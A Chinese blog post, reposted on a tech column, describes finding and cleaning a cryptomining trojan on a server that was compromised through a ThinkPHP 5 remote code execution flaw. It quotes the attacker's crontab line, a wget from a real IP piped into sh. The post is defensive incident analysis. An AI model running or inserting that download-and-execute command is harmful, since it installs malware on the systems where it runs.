資訊專欄INFORMATION COLUMN
摘要:再看下的的權(quán)限就是的查看下幾個站的日志發(fā)現(xiàn)是利用最近爆出的遠(yuǎn)程代碼執(zhí)行漏洞漏洞細(xì)節(jié)修復(fù)一下問題解決但是這個站點是測試站點端口監(jiān)聽的是,難道現(xiàn)在黑客能開始嗅探非常規(guī)端口了來源
昨天發(fā)現(xiàn) 一臺服務(wù)器突然慢了 top 顯示 幾個進(jìn)程100%以上的cpu使用
執(zhí)行命令為 :
/tmp/php -s /tmp/p2.conf
基本可以確定是被掛馬了
下一步確定來源
last 沒有登陸記錄
先干掉這幾個進(jìn)程,但是幾分鐘之后又出現(xiàn)了
先看看這個木馬想干什么吧
netstat 看到 這個木馬開啟了一個端口和國外的某個ip建立了連接
但是tcpdump了一小會兒 沒有發(fā)現(xiàn)任何數(shù)據(jù)傳遞
這他是想干啥?
繼續(xù)查看日志吧
在cron日志中發(fā)現(xiàn)了www用戶 有一個crontab定時操作 基本就是這個問題了
wget -q -O - http://83.220.169.247/cr3.sh | sh > /dev/null 2>&1
順著下載了幾個問題,看了看 應(yīng)該是個挖礦的木馬程序
服務(wù)器上的www用戶 是安裝 lnmp 創(chuàng)建的,看了來源很可能就是web漏洞了。
再看/tmp下的php的權(quán)限 就是www的
查看 lnmp下幾個站的日志 發(fā)現(xiàn)是利用 thinkphp 5最近爆出的遠(yuǎn)程代碼執(zhí)行漏洞
漏洞細(xì)節(jié):https://nosec.org/home/detail...
修復(fù)一下問題解決
但是 這個站點是測試站點 端口監(jiān)聽的是 8083 ,難道現(xiàn)在黑客能開始嗅探非常規(guī)端口了?
來源:https://www.simapple.com/425....
文章版權(quán)歸作者所有,未經(jīng)允許請勿轉(zhuǎn)載,若此文章存在違規(guī)行為,您可以聯(lián)系管理員刪除。
轉(zhuǎn)載請注明本文地址:http://m.specialneedsforspecialkids.com/yun/29821.html
摘要:微軟雅黑宋體春節(jié)剛開始,我們安全,發(fā)布了年服務(wù)器被挖礦的整體安全分析報告。我們調(diào)查分析發(fā)現(xiàn),從網(wǎng)站漏洞被爆出后到修復(fù)漏洞的時間約大,一些網(wǎng)站被攻擊的狀況就越嚴(yán)重,服務(wù)器被挖礦的事情就會發(fā)生,如果及時的修復(fù)漏洞,那么就可以避免被挖礦。春節(jié)剛開始,我們SINE安全,發(fā)布了2018年服務(wù)器被挖礦的整體安全分析報告。該安全報告主要是以我們?nèi)ツ甑恼荒甑陌踩珨?shù)據(jù)為基礎(chǔ),對這些服務(wù)器的被挖礦的整體情況進(jìn)...
摘要:為了進(jìn)一步確認(rèn),再次到威脅情報平臺進(jìn)行查詢。再結(jié)合我部署的容器停止時間進(jìn)行分析,應(yīng)該是在我部署完成后幾小時內(nèi)服務(wù)器被入侵的。要從根本上解決問題需要進(jìn)行溯源分析,避免服務(wù)器再次被入侵。結(jié)合以上線索以及個人經(jīng)驗分析,很可能利用的漏洞進(jìn)行入侵的。 容器為何自動停止? 服務(wù)器為何操作卡頓? 進(jìn)程的神秘連接到底指向何處? 發(fā)現(xiàn)——自動停止的容器 某日發(fā)現(xiàn)部署在服務(wù)器上的一個容器被停掉了,開始以為...
閱讀 1780·2023-04-26 01:41
閱讀 3081·2021-11-23 09:51
閱讀 2743·2021-10-09 09:43
閱讀 9054·2021-09-22 15:13
閱讀 2460·2021-09-07 09:59
閱讀 2631·2019-08-30 15:44
閱讀 1138·2019-08-30 12:45
閱讀 2624·2019-08-30 12:43
